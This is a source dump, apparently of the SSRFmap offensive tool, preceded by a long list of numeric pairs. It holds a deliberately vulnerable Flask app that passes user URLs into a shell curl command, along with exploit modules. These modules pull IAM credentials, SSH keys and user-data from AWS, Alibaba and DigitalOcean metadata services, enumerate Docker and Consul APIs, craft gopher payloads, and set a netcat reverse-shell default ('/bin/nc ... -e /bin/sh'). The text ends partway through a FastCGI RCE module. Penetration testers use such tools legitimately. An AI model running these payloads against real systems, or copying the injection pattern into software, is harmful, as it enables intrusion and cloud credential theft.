1288 7736 | 2286 7737 | 2236 7738 | 167 7739 | 1685 7740 | 1831 7741 | 2981 7742 | 467 7743 | 1574 7744 | 2743 7745 | 19398 7746 | 2469 7747 | 2460 7748 | 1477 7749 | 1478 7750 | 5720 7751 | 3535 7752 | 1582 7753 | 1731 7754 | 679 7755 | 2684 7756 | 2686 7757 | 2681 7758 | 2685 7759 | 1952 7760 | 9397 7761 | 9344 7762 | 2952 7763 | 2579 7764 | 2561 7765 | 1235 7766 | 367 7767 | 8665 7768 | 471 7769 | 2926 7770 | 1815 7771 | 7786 7772 | 8033 7773 | 1581 7774 | 7979 7775 | 1534 7776 | 490 7777 | 3070 7778 | 349 7779 | 1824 7780 | 2511 7781 | 1897 7782 | 6070 7783 | 2118 7784 | 2117 7785 | 1231 7786 | 24003 7787 | 24004 7788 | 24006 7789 | 24000 7790 | 3594 7791 | 24002 7792 | 24001 7793 | 24005 7794 | 5418 7795 | 2698 7796 | 8763 7797 | 1820 7798 | 1899 7799 | 2587 7800 | 8911 7801 | 8910 7802 | 1593 7803 | 2535 7804 | 4181 7805 | 2559 7806 | 3069 7807 | 2620 7808 | 1298 7809 | 2540 7810 | 2541 7811 | 2125 7812 | 1487 7813 | 2283 7814 | 2284 7815 | 2285 7816 | 2281 7817 | 2282 7818 | 2813 7819 | 5355 7820 | 2814 7821 | 2795 7822 | 1555 7823 | 1968 7824 | 2611 7825 | 245 7826 | 4042 7827 | 1682 7828 | 1485 7829 | 2560 7830 | 2841 7831 | 2370 7832 | 2842 7833 | 2840 7834 | 398 7835 | 2424 7836 | 1773 7837 | 1649 7838 | 287 7839 | 2656 7840 | 2213 7841 | 2822 7842 | 1289 7843 | 3471 7844 | 3470 7845 | 3042 7846 | 4114 7847 | 6962 7848 | 6961 7849 | 1567 7850 | 2808 7851 | 1706 7852 | 2406 7853 | 2508 7854 | 2506 7855 | 1623 7856 | 13160 7857 | 2166 7858 | 2866 7859 | 2982 7860 | 1275 7861 | 1573 7862 | 4348 7863 | 1828 7864 | 3084 7865 | 1609 7866 | 2853 7867 | 3589 7868 | 147 7869 | 3501 7870 | 1643 7871 | 1642 7872 | 1245 7873 | 43190 7874 | 2962 7875 | 2963 7876 | 576 7877 | 2549 7878 | 1579 7879 | 1585 7880 | 503 7881 | 1907 7882 | 3202 7883 | 3548 7884 | 3060 7885 | 2652 7886 | 2633 7887 | 16991 7888 | 495 7889 | 1602 7890 | 1490 7891 | 2793 7892 | 18881 7893 | 2854 7894 | 2319 7895 | 2233 7896 | 3345 7897 | 2454 7898 | 8130 7899 | 8131 7900 | 2127 7901 | 2970 7902 | 2932 7903 | 3164 7904 | 1710 7905 | 11319 7906 | 27345 7907 | 2801 7908 | 1284 7909 | 2995 7910 | 3797 7911 | 2966 7912 | 2590 7913 | 549 7914 | 1725 7915 | 2337 7916 | 3130 7917 | 5813 7918 | 25008 7919 | 25007 7920 | 25006 7921 | 25005 7922 | 25004 7923 | 25003 7924 | 25002 7925 | 25009 7926 | 6850 7927 | 1344 7928 | 1604 7929 | 8733 7930 | 2572 7931 | 1260 7932 | 1586 7933 | 1726 7934 | 6999 7935 | 6998 7936 | 2140 7937 | 2139 7938 | 2141 7939 | 1577 7940 | 4180 7941 | 4827 7942 | 1877 7943 | 2715 7944 | 19412 7945 | 19410 7946 | 19411 7947 | 5404 7948 | 5403 7949 | 2985 7950 | 1803 7951 | 2744 7952 | 6790 7953 | 2575 7954 | 12172 7955 | 1789 7956 | 35000 7957 | 1281 7958 | 14937 7959 | 14936 7960 | 263 7961 | 375 7962 | 5094 7963 | 1816 7964 | 2245 7965 | 1238 7966 | 2778 7967 | 9321 7968 | 2643 7969 | 2421 7970 | 488 7971 | 1850 7972 | 2458 7973 | 41 7974 | 2519 7975 | 6109 7976 | 1774 7977 | 2833 7978 | 3862 7979 | 3381 7980 | 1590 7981 | 2626 7982 | 1738 7983 | 2732 7984 | 19539 7985 | 2849 7986 | 2358 7987 | 1786 7988 | 1787 7989 | 1657 7990 | 2429 7991 | 1747 7992 | 1746 7993 | 5408 7994 | 5407 7995 | 2359 7996 | 24677 7997 | 1874 7998 | 2946 7999 | 2509 8000 | 1873 8001 | 2747 8002 | 2751 8003 | 2750 8004 | 2748 8005 | 2749 8006 | 9396 8007 | 3067 8008 | 1848 8009 | 9374 8010 | 2510 8011 | 2615 8012 | 1689 8013 | 4682 8014 | 3350 8015 | 24242 8016 | 3401 8017 | 3294 8018 | 3293 8019 | 5503 8020 | 5504 8021 | 5746 8022 | 5745 8023 | 2344 8024 | 7437 8025 | 3353 8026 | 2689 8027 | 3873 8028 | 1561 8029 | 1915 8030 | 2792 8031 | 10103 8032 | 26260 8033 | 26261 8034 | 589 8035 | 1948 8036 | 2666 8037 | 26489 8038 | 26487 8039 | 2769 8040 | 2674 8041 | 6066 8042 | 1876 8043 | 2835 8044 | 2834 8045 | 2782 8046 | 16309 8047 | 2969 8048 | 2867 8049 | 2797 8050 | 2950 8051 | 1822 8052 | 1342 8053 | 5135 8054 | 2650 8055 | 2109 8056 | 2051 8057 | 2912 8058 | 309 8059 | 1865 8060 | 3289 8061 | 1804 8062 | 3286 8063 | 1740 8064 | 2211 8065 | 2707 8066 | 1273 8067 | 2181 8068 | 2553 8069 | 2896 8070 | 2858 8071 | 3610 8072 | 2651 8073 | 1325 8074 | 2445 8075 | 1265 8076 | 3053 8077 | 1292 8078 | 1878 8079 | 4098 8080 | 1780 8081 | 1795 8082 | 4099 8083 | 1821 8084 | 2151 8085 | 1227 8086 | 436 8087 | 2287 8088 | 32636 8089 | 1489 8090 | 1263 8091 | 5419 8092 | 3041 8093 | 2496 8094 | 3287 8095 | 6073 8096 | 2234 8097 | 242 8098 | 1844 8099 | 2362 8100 | 11112 8101 | 1941 8102 | 3046 8103 | 1945 8104 | 6072 8105 | 2960 8106 | 5426 8107 | 2753 8108 | 3298 8109 | 1702 8110 | 1256 8111 | 1254 8112 | 1266 8113 | 2562 8114 | 1656 8115 | 1655 8116 | 579 8117 | 1255 8118 | 1415 8119 | 2365 8120 | 2345 8121 | 6104 8122 | 8132 8123 | 1908 8124 | 3282 8125 | 1857 8126 | 1679 8127 | 2870 8128 | 3458 8129 | 5420 8130 | 772 8131 | 3645 8132 | 551 8133 | 1686 8134 | 3773 8135 | 4379 8136 | 1851 8137 | 3022 8138 | 2807 8139 | 2890 8140 | 1837 8141 | 2955 8142 | 3145 8143 | 1471 8144 | 1468 8145 | 40841 8146 | 40842 8147 | 40843 8148 | 1724 8149 | 2422 8150 | 6253 8151 | 455 8152 | 3201 8153 | 5984 8154 | 2324 8155 | 3288 8156 | 5412 8157 | 2137 8158 | 1648 8159 | 1802 8160 | 4308 8161 | 2459 8162 | 48556 8163 | 2757 8164 | 1757 8165 | 1294 8166 | 7174 8167 | 1944 8168 | 371 8169 | 504 8170 | 1741 8171 | 2931 8172 | 3020 8173 | 17219 8174 | 3903 8175 | 1768 8176 | 1767 8177 | 1766 8178 | 1765 8179 | 2856 8180 | 1640 8181 | 1639 8182 | 1794 8183 | 3987 8184 | 2571 8185 | 2412 8186 | 3315 8187 | 2116 8188 | 3061 8189 | 2836 8190 | 3450 8191 | 3105 8192 | 1756 8193 | 9283 8194 | 2906 8195 | 588 8196 | 1202 8197 | 1375 8198 | 2803 8199 | 2536 8200 | 1252 8201 | 2619 8202 | 1323 8203 | 2990 8204 | 1304 8205 | 2961 8206 | 6402 8207 | 6403 8208 | 3561 8209 | 1770 8210 | 1769 8211 | 2877 8212 | 10288 8213 | 2911 8214 | 2032 8215 | 2663 8216 | 2662 8217 | 1962 8218 | 310 8219 | 357 8220 | 354 8221 | 482 8222 | 2414 8223 | 2852 8224 | 1951 8225 | 1704 8226 | 3327 8227 | 573 8228 | 567 8229 | 2708 8230 | 2131 8231 | 2772 8232 | 3643 8233 | 1749 8234 | 5042 8235 | 1913 8236 | 2624 8237 | 1826 8238 | 2136 8239 | 2616 8240 | 9164 8241 | 9163 8242 | 9162 8243 | 1781 8244 | 2929 8245 | 1320 8246 | 2848 8247 | 2268 8248 | 459 8249 | 1536 8250 | 2639 8251 | 6831 8252 | 10080 8253 | 1845 8254 | 1653 8255 | 1849 8256 | 463 8257 | 2740 8258 | 2473 8259 | 2783 8260 | 1481 8261 | 2785 8262 | 2331 8263 | 7107 8264 | 1219 8265 | 3279 8266 | 5411 8267 | 2796 8268 | 2149 8269 | 7781 8270 | 1205 8271 | 4108 8272 | 4885 8273 | 1546 8274 | 2894 8275 | 1601 8276 | 2878 8277 | 5605 8278 | 5604 8279 | 5602 8280 | 5603 8281 | 3284 8282 | 1742 8283 | -------------------------------------------------------------------------------- /examples/curl-7.71.0.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/swisskyrepo/SSRFmap/99fac918959240b62a0d6dbf479b8f44d2f8bd9e/examples/curl-7.71.0.tar.gz -------------------------------------------------------------------------------- /examples/example.py: -------------------------------------------------------------------------------- 1 | # NOTE: Do not try this at home - highly vulnerable ! (SSRF and RCE) 2 | # NOTE: SSRF examples script 3 | # FLASK_APP=example.py flask run 4 | 5 | from flask import Flask, request 6 | import re 7 | import subprocess 8 | import urllib.parse 9 | 10 | app = Flask(__name__) 11 | 12 | @app.route("/") 13 | def hello(): 14 | return "SSRF Example!" 15 | 16 | # curl -i -X POST -d 'url=http://example.com' http://localhost:5000/ssrf 17 | @app.route("/ssrf", methods=['POST']) 18 | def ssrf(): 19 | data = request.values 20 | content = command(f"curl {data.get('url')}") 21 | return content 22 | 23 | # curl -i -H "Content-Type: application/json" -X POST -d '{"url": "http://example.com"}' http://localhost:5000/ssrf2 24 | @app.route("/ssrf2", methods=['POST']) 25 | def ssrf2(): 26 | data = request.json 27 | print(data) 28 | print(data.get('url')) 29 | content = command(f"curl {data.get('url')}") 30 | return content 31 | 32 | # curl -v "http://127.0.0.1:5000/ssrf3?url=http://example.com" 33 | @app.route("/ssrf3", methods=['GET']) 34 | def ssrf3(): 35 | data = request.values 36 | content = command(f"curl {data.get('url')}") 37 | return content 38 | 39 | # curl -X POST -H "Content-Type: application/xml" -d '4142430A0http://google.com' http://127.0.0.1:5000/ssrf4 40 | @app.route("/ssrf4", methods=['POST']) 41 | def ssrf4(): 42 | data = request.data 43 | regex = re.compile("url>(.*?)4142430A0*FUZZ* -------------------------------------------------------------------------------- /examples/request5.txt: -------------------------------------------------------------------------------- 1 | POST /index.php HTTP/1.1 2 | Host: ctf.hacklab-esgi.org:8082 3 | Content-Length: 5 4 | Cache-Control: max-age=0 5 | Origin: http://ctf.hacklab-esgi.org:8082 6 | Upgrade-Insecure-Requests: 1 7 | Content-Type: application/x-www-form-urlencoded 8 | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36 OPR/60.0.3255.15 (Edition beta) 9 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 10 | Referer: http://ctf.hacklab-esgi.org:8082/ 11 | Accept-Encoding: gzip, deflate 12 | Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7 13 | Cookie: session=718ec500-02c9-433e-ac3d-ece753ee1169 14 | Connection: close 15 | 16 | url=FUZZME -------------------------------------------------------------------------------- /examples/request6.txt: -------------------------------------------------------------------------------- 1 | GET /ssrf5 HTTP/1.1 2 | Host: 127.0.0.1:5000 3 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0 4 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 5 | Accept-Language: en-US,en;q=0.5 6 | Accept-Encoding: gzip, deflate 7 | Referer: http://mysimple.ssrf/ 8 | X-Custom-Header: http://example.com 9 | Connection: close 10 | Upgrade-Insecure-Requests: 1 -------------------------------------------------------------------------------- /examples/ssrf_dns.py: -------------------------------------------------------------------------------- 1 | # NOTE example script heavily inspired from FCSC CTF 2024 2 | # use this example to test the AXFR module 3 | # dig @127.0.0.1 -p 53 example.lab AXFR 4 | 5 | from dnslib.server import DNSServer, BaseResolver 6 | from dnslib import RR, QTYPE, RCODE, A 7 | from dns import resolver 8 | import threading 9 | 10 | DOMAINS = { 11 | "frontend.example.lab.": "10.10.10.10", 12 | "backend.example.lab.": "10.10.10.11", 13 | "secret_flag.example.lab.": "10.10.10.12", 14 | "test.example.lab.": "10.10.10.12" 15 | } 16 | 17 | class LocalDNS(BaseResolver): 18 | def resolve(self, request, handler): 19 | reply = request.reply() 20 | q = request.q 21 | 22 | print('', flush=True) 23 | 24 | if q.qtype == QTYPE.A and str(q.qname) in DOMAINS: 25 | reply.add_answer(RR(q.qname, QTYPE.A, rdata=A(DOMAINS[str(q.qname)]))) 26 | elif q.qtype == QTYPE.A: 27 | default_resolver = resolver.Resolver() 28 | try: 29 | answers = default_resolver.resolve(str(q.qname), "A") 30 | for answer in answers: 31 | reply.add_answer(RR(q.qname, QTYPE.A, rdata=A(answer.address))) 32 | except: 33 | reply.header.rcode = RCODE.NXDOMAIN 34 | elif q.qtype == QTYPE.AXFR and str(q.qname) == "example.lab.": 35 | for domain, ip in DOMAINS.items(): 36 | reply.add_answer(RR(domain, QTYPE.A, rdata=A(ip))) 37 | else: 38 | reply.header.rcode = RCODE.NXDOMAIN 39 | 40 | return reply 41 | 42 | def run_server(protocol): 43 | print(f"Server is running - {protocol}") 44 | resolver = LocalDNS() 45 | server = DNSServer(resolver, address="0.0.0.0", port=53, tcp=(protocol == "TCP")) 46 | server.start() 47 | 48 | if __name__ == "__main__": 49 | threading.Thread(target=run_server, args=("TCP",)).start() 50 | threading.Thread(target=run_server, args=("UDP",)).start() 51 | -------------------------------------------------------------------------------- /handlers/http.py: -------------------------------------------------------------------------------- 1 | from core.utils import * 2 | from core.handler import Handler 3 | import re 4 | import logging 5 | import urllib.parse 6 | 7 | class exploit(Handler): 8 | 9 | def __init__(self, port): 10 | super().__init__(port) 11 | 12 | def run(self): 13 | self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 14 | self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) 15 | self.socket.bind(('', self.port)) 16 | self.injected_params = [] 17 | 18 | while True: 19 | self.socket.listen(5) 20 | self.client, address = self.socket.accept() 21 | 22 | response = self.client.recv(1024).decode() 23 | if self.socket._closed or not response: 24 | break 25 | 26 | logging.info(f"New session from : \033[32m{address[0]}\033[0m") 27 | self.connected = True 28 | 29 | regex = re.compile('(.*) (.*) HTTP') 30 | request_method, request_action = regex.findall(response)[0] 31 | request_param = urllib.parse.urlsplit(request_action).query 32 | logging.info(f"Possible injected param: \033[32m{request_param}\033[0m") 33 | self.injected_params.append(request_param) 34 | 35 | response_header = "HTTP/1.1 200 OK\n" 36 | response_header += 'Server: I-See-You\n' 37 | response_header += 'Connection: close\n\n' 38 | self.client.send(response_header.encode()) 39 | self.client.close() 40 | 41 | def kill(self): 42 | socket.socket(socket.AF_INET, socket.SOCK_STREAM).connect(self.socket.getsockname()) # trigger last connection to closing 43 | self.socket.close() 44 | 45 | def listen_command(self): 46 | # shutdown handler 47 | if not self.socket._closed: 48 | self.kill() 49 | else: 50 | exit() 51 | -------------------------------------------------------------------------------- /modules/alibaba.py: -------------------------------------------------------------------------------- 1 | from core.utils import * 2 | import logging 3 | import os 4 | 5 | name = "alibaba" 6 | description = "Access sensitive data from the Alibaba Cloud" 7 | author = "Swissky" 8 | documentation = [""] 9 | 10 | class exploit(): 11 | endpoints = set() 12 | 13 | def __init__(self, requester, args): 14 | logging.info(f"Module '{name}' launched !") 15 | self.add_endpoints() 16 | 17 | r = requester.do_request(args.param, "") 18 | if r != None: 19 | default = r.text 20 | 21 | # Create directory to store files 22 | directory = requester.host 23 | # Replace : with _ for window folder name safe 24 | # https://www.ibm.com/docs/en/spectrum-archive-sde/2.4.1.0?topic=tips-file-name-characters 25 | directory = directory.replace(':','_') 26 | if not os.path.exists(directory): 27 | os.makedirs(directory) 28 | 29 | for endpoint in self.endpoints: 30 | payload = wrapper_http(endpoint[1], endpoint[0] , "80") 31 | r = requester.do_request(args.param, payload) 32 | diff = diff_text(r.text, default) 33 | if diff != "": 34 | 35 | # Display diff between default and ssrf request 36 | logging.info(f"\033[32mReading file\033[0m : {payload}") 37 | print(diff) 38 | 39 | # Write diff to a file 40 | filename = endpoint[1].split('/')[-1] 41 | if filename == "": 42 | filename = endpoint[1].split('/')[-2:-1][0] 43 | 44 | logging.info(f"\033[32mWriting file\033[0m : {payload} to {directory + '/' + filename}") 45 | with open(directory + "/" + filename, 'w') as f: 46 | f.write(diff) 47 | 48 | 49 | def add_endpoints(self): 50 | self.endpoints.add( ("100.100.100.200","latest/meta-data/instance-id") ) 51 | self.endpoints.add( ("100.100.100.200","latest/meta-data/image-id") ) 52 | self.endpoints.add( ("100.100.100.200","latest/meta-data/") ) -------------------------------------------------------------------------------- /modules/aws.py: -------------------------------------------------------------------------------- 1 | from core.utils import * 2 | import logging 3 | import os 4 | 5 | name = "aws" 6 | description = "Access sensitive data from AWS" 7 | author = "Swissky" 8 | documentation = [ 9 | "https://hackerone.com/reports/53088", 10 | "https://hackerone.com/reports/285380", 11 | "https://blog.christophetd.fr/abusing-aws-metadata-service-using-ssrf-vulnerabilities/", 12 | "https://twitter.com/spengietz/status/1161317376060563456" 13 | ] 14 | 15 | class exploit(): 16 | endpoints = set() 17 | 18 | def __init__(self, requester, args): 19 | logging.info(f"Module '{name}' launched !") 20 | self.add_endpoints() 21 | 22 | r = requester.do_request(args.param, "") 23 | if r != None: 24 | default = r.text 25 | 26 | # Create directory to store files 27 | directory = requester.host 28 | # Replace : with _ for window folder name safe 29 | # https://www.ibm.com/docs/en/spectrum-archive-sde/2.4.1.0?topic=tips-file-name-characters 30 | directory = directory.replace(':','_') 31 | if not os.path.exists(directory): 32 | os.makedirs(directory) 33 | 34 | for endpoint in self.endpoints: 35 | payload = wrapper_http(endpoint[1], endpoint[0] , endpoint[2]) 36 | r = requester.do_request(args.param, payload) 37 | diff = diff_text(r.text, default) 38 | if diff != "": 39 | 40 | # Display diff between default and ssrf request 41 | logging.info(f"\033[32mReading file\033[0m : {payload}") 42 | print(diff) 43 | 44 | # Write diff to a file 45 | filename = endpoint[1].split('/')[-1] 46 | if filename == "": 47 | filename = endpoint[1].split('/')[-2:-1][0] 48 | 49 | logging.info(f"\033[32mWriting file\033[0m : {payload} to {directory + '/' + filename}") 50 | with open(directory + "/" + filename, 'w') as f: 51 | f.write(diff) 52 | 53 | 54 | def add_endpoints(self): 55 | self.endpoints.add( ("169.254.169.254","latest/user-data", "80") ) 56 | self.endpoints.add( ("169.254.169.254","latest/meta-data/ami-id", "80") ) 57 | self.endpoints.add( ("169.254.169.254","latest/meta-data/reservation-id", "80") ) 58 | self.endpoints.add( ("169.254.169.254","latest/meta-data/hostname", "80") ) 59 | self.endpoints.add( ("169.254.169.254","latest/meta-data/public-keys/0/openssh-key", "80") ) 60 | self.endpoints.add( ("169.254.169.254","latest/meta-data/public-keys/1/openssh-key", "80") ) 61 | self.endpoints.add( ("169.254.169.254","latest/meta-data/public-keys/2/openssh-key", "80") ) 62 | self.endpoints.add( ("169.254.169.254","latest/meta-data/iam/security-credentials/dummy", "80") ) 63 | self.endpoints.add( ("169.254.169.254","latest/meta-data/iam/security-credentials/ecsInstanceRole", "80") ) 64 | self.endpoints.add( ("169.254.169.254","latest/meta-data/iam/security-credentials/", "80") ) 65 | self.endpoints.add( ("169.254.169.254","latest/meta-data/public-keys/", "80") ) 66 | self.endpoints.add( ("169.254.169.254","latest/user-data/", "80") ) 67 | self.endpoints.add( ("localhost","2018-06-01/runtime/invocation/next", "9001") ) 68 | -------------------------------------------------------------------------------- /modules/axfr.py: -------------------------------------------------------------------------------- 1 | from core.utils import wrapper_gopher, gen_ip_list 2 | from urllib.parse import quote 3 | import logging 4 | import binascii 5 | 6 | name = "axfr" 7 | description = "AXFR DNS" 8 | author = "Swissky" 9 | documentation = [ 10 | "https://vozec.fr/writeups/pong-fcsc2024-en/", 11 | "https://mizu.re/post/pong", 12 | "https://gist.github.com/Siss3l/32591a6d6f33f78bb300bfef241de262" 13 | ] 14 | 15 | class exploit(): 16 | SERVER_HOST = "127.0.0.1" 17 | SERVER_PORT = "53" 18 | SERVER_DOMAIN = "example.lab" 19 | 20 | def __init__(self, requester, args): 21 | logging.info(f"Module '{name}' launched !") 22 | 23 | # Handle args for custom DNS target 24 | if args.lhost is not None: 25 | self.SERVER_HOST = args.lhost 26 | if args.lport is not None: 27 | self.SERVER_PORT = args.lport 28 | if args.ldomain is not None: 29 | self.SERVER_DOMAIN = args.ldomain 30 | 31 | # Using a generator to create the host list 32 | gen_host = gen_ip_list(self.SERVER_HOST, args.level) 33 | for ip in gen_host: 34 | domain,tld = self.SERVER_DOMAIN.split('.') 35 | 36 | # DNS AXFR - TCP packet format 37 | dns_request = b"\x01\x03\x03\x07" # BITMAP 38 | dns_request += b"\x00\x01" # QCOUNT 39 | dns_request += b"\x00\x00" # ANCOUNT 40 | dns_request += b"\x00\x00" # NSCOUNT 41 | dns_request += b"\x00\x00" # ARCOUNT 42 | 43 | dns_request += len(domain).to_bytes() # LEN DOMAIN 44 | dns_request += domain.encode() # DOMAIN 45 | dns_request += len(tld).to_bytes() # LEN TLD 46 | dns_request += tld.encode() # TLD 47 | dns_request += b"\x00" # DNAME EOF 48 | 49 | dns_request += b"\x00\xFC" # QTYPE AXFR (252) 50 | dns_request += b"\x00\x01" # QCLASS IN (1) 51 | dns_request = len(dns_request).to_bytes(2, byteorder="big") + dns_request 52 | 53 | payload = wrapper_gopher(quote(dns_request), ip , self.SERVER_PORT) 54 | 55 | # Send the payload 56 | r = requester.do_request(args.param, payload) 57 | self.parse_output(r.text) 58 | 59 | 60 | def parse_output(self, data): 61 | # removing header part 62 | lheader = len(b"\x00" + b"\x6a" + b"\x01\x03" + b"\xef\xbf\xbd" + b"\xef\xbf\xbd" + b"\x00") 63 | lother = len(b"\x01\x00" + b"\x03" + b"\x00\x00\x00\x00") 64 | hex_output = binascii.hexlify(data.encode()) 65 | hex_output = hex_output[(lheader+lother)*2:] 66 | data = binascii.unhexlify(hex_output) 67 | 68 | # extracting size 69 | domain_size = data[0] 70 | domain = data[1:domain_size+1] 71 | logging.debug(f"DOMAIN: {domain_size}, {domain.decode()}") 72 | 73 | tld_size = data[domain_size+1] 74 | tld = data[domain_size+2:domain_size+2+tld_size] 75 | logging.debug(f"TLD: {tld_size}, {tld.decode()}") 76 | 77 | # subdomains 78 | subdata = data[domain_size+2+tld_size:] 79 | subdata_arr = subdata.decode().split("�") 80 | for sub in subdata_arr: 81 | printable = self.bytes_to_printable_string(sub.encode()) 82 | if printable != '': 83 | logging.info(f"\033[32mSubdomain found\033[0m : {printable}") 84 | 85 | 86 | def bytes_to_printable_string(self, byte_string): 87 | # Filter out non-printable characters and decode the byte string 88 | printable_chars = (chr(byte) for byte in byte_string if chr(byte).isprintable()) 89 | # Concatenate the printable characters into a single string 90 | printable_string = ''.join(printable_chars) 91 | return printable_string -------------------------------------------------------------------------------- /modules/consul.py: -------------------------------------------------------------------------------- 1 | from core.utils import * 2 | import logging 3 | import json 4 | import urllib.parse 5 | 6 | # NOTE : NOT TESTED YET 7 | # might need some editing to work properly ! 8 | 9 | name = "consul" 10 | description = "Hashicorp Consul Info Leak - Open API" 11 | author = "Swissky" 12 | documentation = [ 13 | "https://www.consul.io/api/agent.html" 14 | ] 15 | 16 | class exploit(): 17 | 18 | def __init__(self, requester, args): 19 | logging.info(f"Module '{name}' launched !") 20 | gen_host = gen_ip_list("127.0.0.1", args.level) 21 | port = "8500" 22 | 23 | # List Members 24 | for ip in gen_host: 25 | data = "/v1/agent/members" 26 | payload = wrapper_http(data, ip, port) 27 | r = requester.do_request(args.param, payload) 28 | 29 | if r.json: 30 | print(r.json) 31 | 32 | # Read Configuration 33 | for ip in gen_host: 34 | data = "/v1/agent/self" 35 | payload = wrapper_http(data, ip, port) 36 | r = requester.do_request(args.param, payload) 37 | 38 | if r.json: 39 | print(r.json) -------------------------------------------------------------------------------- /modules/custom.py: -------------------------------------------------------------------------------- 1 | from core.utils import * 2 | import urllib.parse 3 | import logging 4 | 5 | name = "custom" 6 | description = "Send custom data to a listening service, e.g: netcat" 7 | author = "Swissky" 8 | documentation = [] 9 | 10 | class exploit(): 11 | SERVICE_IP = "127.0.0.1" 12 | SERVICE_PORT = "8080" 13 | SERVICE_DATA = "/bin/nc 127.0.0.1 4444 -e /bin/sh &" 14 | 15 | def __init__(self, requester, args): 16 | logging.info(f"Module '{name}' launched !") 17 | gen_hosts = gen_ip_list("127.0.0.1", args.level) 18 | self.SERVICE_PORT = input("Service Port: ") 19 | self.SERVICE_DATA = "%0d%0a"+urllib.parse.quote(input("Service Data: ")) 20 | 21 | for gen_host in gen_hosts: 22 | payload = wrapper_gopher(self.SERVICE_DATA, gen_host, self.SERVICE_PORT) 23 | 24 | if args.verbose == True: 25 | logging.info(f"Generated payload : {payload}") 26 | 27 | r = requester.do_request(args.param, payload) 28 | 29 | if args.verbose == True: 30 | logging.info(f"Module '{name}' ended !") -------------------------------------------------------------------------------- /modules/digitalocean.py: -------------------------------------------------------------------------------- 1 | from core.utils import * 2 | import logging 3 | import os 4 | 5 | name = "digitalocean" 6 | description = "Access sensitive data from the Digital Ocean provider" 7 | author = "Swissky" 8 | documentation = ["https://developers.digitalocean.com/documentation/metadata/"] 9 | 10 | class exploit(): 11 | endpoints = set() 12 | 13 | def __init__(self, requester, args): 14 | logging.info(f"Module '{name}' launched !") 15 | self.add_endpoints() 16 | 17 | r = requester.do_request(args.param, "") 18 | if r != None: 19 | default = r.text 20 | 21 | # Create directory to store files 22 | directory = requester.host 23 | # Replace : with _ for window folder name safe 24 | # https://www.ibm.com/docs/en/spectrum-archive-sde/2.4.1.0?topic=tips-file-name-characters 25 | directory = directory.replace(':','_') 26 | if not os.path.exists(directory): 27 | os.makedirs(directory) 28 | 29 | for endpoint in self.endpoints: 30 | payload = wrapper_http(endpoint[1], endpoint[0] , "80") 31 | r = requester.do_request(args.param, payload) 32 | diff = diff_text(r.text, default) 33 | if diff != "": 34 | 35 | # Display diff between default and ssrf request 36 | logging.info(f"\033[32mReading file\033[0m : {payload}") 37 | print(diff) 38 | 39 | # Write diff to a file 40 | filename = endpoint[1].split('/')[-1] 41 | logging.info(f"\033[32mWriting file\033[0m : {payload} to {directory + '/' + filename}") 42 | with open(directory + "/" + filename, 'w') as f: 43 | f.write(diff) 44 | 45 | 46 | def add_endpoints(self): 47 | self.endpoints.add( ("169.254.169.254","metadata/v1/id") ) 48 | self.endpoints.add( ("169.254.169.254","metadata/v1/user-data") ) 49 | self.endpoints.add( ("169.254.169.254","metadata/v1/hostname") ) 50 | self.endpoints.add( ("169.254.169.254","metadata/v1/region") ) 51 | self.endpoints.add( ("169.254.169.254","metadata/v1/public-keys") ) 52 | self.endpoints.add( ("169.254.169.254","metadata/v1.json") ) 53 | -------------------------------------------------------------------------------- /modules/docker.py: -------------------------------------------------------------------------------- 1 | from core.utils import * 2 | import logging 3 | import json 4 | import urllib.parse 5 | 6 | # NOTE 7 | # Enable Remote API with the following command 8 | # /usr/bin/dockerd -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock 9 | 10 | name = "docker" 11 | description = "Docker Infoleaks via Open Docker API" 12 | author = "Swissky" 13 | documentation = [] 14 | 15 | class exploit(): 16 | 17 | def __init__(self, requester, args): 18 | logging.info(f"Module '{name}' launched !") 19 | gen_host = gen_ip_list("127.0.0.1", args.level) 20 | port = "2375" 21 | 22 | for ip in gen_host: 23 | 24 | # Step 1 - Extract id and name from each container 25 | data = "containers/json" 26 | payload = wrapper_http(data, ip, port) 27 | r = requester.do_request(args.param, payload) 28 | 29 | if r.json: 30 | for container in r.json(): 31 | container_id = container['Id'] 32 | container_name = container['Names'][0].replace('/','') 33 | container_command = container['Command'] 34 | 35 | logging.info("Found docker container") 36 | logging.info(f"\033[32mId\033[0m : {container_id}") 37 | logging.info(f"\033[32mName\033[0m : {container_name}") 38 | logging.info(f"\033[32mCommand\033[0m : {container_command}\n") 39 | 40 | # Step 2 - Extract id and name from each image 41 | data = "images/json" 42 | payload = wrapper_http(data, ip, port) 43 | r = requester.do_request(args.param, payload) 44 | 45 | if r.json: 46 | images = {} 47 | for index, container in enumerate(r.json()): 48 | container_id = container['Id'] 49 | container_name = container['RepoTags'][0].replace('/','') 50 | 51 | logging.info(f"Found docker image n°{index}") 52 | logging.info(f"\033[32mId\033[0m : {container_id}") 53 | logging.info(f"\033[32mName\033[0m : {container_name}\n") 54 | images[container_name] = container_id -------------------------------------------------------------------------------- /modules/fastcgi.py: -------------------------------------------------------------------------------- 1 | from core.utils import * 2 | import logging 3 | 4 | name = "fastcgi" 5 | description = "FastCGI RCE" 6 | author = "Unknown" 7 | documentation = [] 8 | 9 | class exploit(): 10 | SERVER_HOST = "127.0.0.1" 11 | SERVER_PORT = "4242" 12 | 13 | def __init__(self, requester, args): 14 | logging.info(f"Module '{name}' launched !") 15 | 16 | # Handle args for reverse shell 17 | if args.lhost == None: self.SERVER_HOST = input("Server Host:") 18 | else: self.SERVER_HOST = args.lhost 19 | 20 | if args.lport == None: self.SERVER_PORT = input("Server Port:") 21 | else: self.SERVER_PORT = args.lport 22 | 23 | # Using a generator to create the host list 24 | # Edit the following ip if you need to target something else 25 | gen_host = gen_ip_list("127.0.0.1", args.level) 26 | for ip in gen_host: 27 | 28 | # Data and port for the service 29 | port = "9000" 30 | data = 